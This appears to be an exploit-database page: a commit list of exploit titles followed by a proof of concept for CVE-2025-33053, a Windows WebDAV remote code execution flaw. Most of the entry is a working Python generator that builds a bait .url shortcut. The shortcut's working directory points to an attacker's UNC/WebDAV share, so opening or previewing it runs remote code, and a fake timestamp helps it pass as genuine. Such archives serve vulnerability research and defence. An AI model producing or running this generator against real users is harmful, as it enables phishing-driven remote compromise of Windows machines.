3cfac1e6a4
15 changes to exploits/shellcodes/ghdb AirKeyboard iOS App 1.0.5 - Remote Input Injection Parrot and DJI variants Drone OSes - Kernel Panic Exploit Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS) Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation PHP CGI Module 8.3.4 - Remote Code Execution (RCE) Microsoft Excel Use After Free - Local Code Execution PCMan FTP Server 2.0.7 - Buffer Overflow PCMan FTP Server 2.0.7 - Remote Buffer Overflow WebDAV Windows 10 - Remote Code Execution (RCE) Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
62 lines
No EOL
2.2 KiB
Text
62 lines
No EOL
2.2 KiB
Text
Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE)
|
|
Date: June 2025
|
|
Author: Dev Bui Hieu
|
|
Tested on: Windows 10, Windows 11
|
|
Platform: Windows
|
|
Type: Remote
|
|
CVE: CVE-2025-33053
|
|
|
|
Description:
|
|
This exploit leverages the behavior of Windows .URL files to execute a
|
|
remote binary over a UNC path. When a victim opens or previews the .URL
|
|
file (e.g. from email), the system may automatically reach out to the
|
|
specified path (e.g. WebDAV or SMB share), leading to arbitrary code
|
|
execution without prompt.
|
|
|
|
```bash
|
|
python3 gen_url.py --ip 192.168.1.100 --out doc.url
|
|
```
|
|
|
|
import argparse
|
|
|
|
def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
|
|
content = f"""[InternetShortcut]
|
|
URL={url_target}
|
|
WorkingDirectory={working_directory}
|
|
ShowCommand=7
|
|
IconIndex={icon_index}
|
|
IconFile={icon_file}
|
|
Modified={modified}
|
|
"""
|
|
with open(output_file, "w", encoding="utf-8") as f:
|
|
f.write(content)
|
|
print(f"[+] .url file created: {output_file}")
|
|
|
|
def main():
|
|
parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)")
|
|
|
|
parser.add_argument('--out', default="bait.url", help="Output .url file name")
|
|
parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path")
|
|
parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)")
|
|
parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe",
|
|
help="Target executable path on victim machine")
|
|
parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
|
|
help="Icon file path")
|
|
parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)")
|
|
parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)")
|
|
|
|
args = parser.parse_args()
|
|
|
|
working_directory = fr"\\{args.ip}\{args.share}\\"
|
|
|
|
generate_url_file(
|
|
output_file=args.out,
|
|
url_target=args.exe,
|
|
working_directory=working_directory,
|
|
icon_file=args.icon,
|
|
icon_index=args.index,
|
|
modified=args.modified
|
|
)
|
|
|
|
if __name__ == "__main__":
|
|
main() |